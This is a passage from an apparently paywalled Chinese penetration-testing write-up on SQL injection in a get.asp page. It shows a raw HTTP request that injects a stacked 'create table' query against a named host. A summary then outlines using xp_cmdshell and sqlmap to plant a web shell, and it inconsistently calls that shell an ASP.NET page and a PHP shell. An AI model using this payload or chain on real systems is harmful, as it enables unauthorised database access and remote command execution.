1 存在sql注入
创建表
GET /get.asp?act_id=52;create+table+gogotest+(tmp+varchar(1000));----&user_name=123 HTTP/1.1
Host: 360gongfang.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDSCSRDDQC=EKFDMMLAFPMPKBFAPLIMPBKI
验证
本文探讨了如何利用SQL注入漏洞来获取网站的绝对路径,并通过sqlmap工具演示了写入ASP.NET页面的过程。首先,通过创建表和验证存在SQL注入,然后利用`xp_cmdshell`执行命令获取图片路径。最后,使用sqlmap写入恶意的PHP shell到目标路径,以实现远程命令执行。
订阅专栏 解锁全文
635

被折叠的 条评论
为什么被折叠?



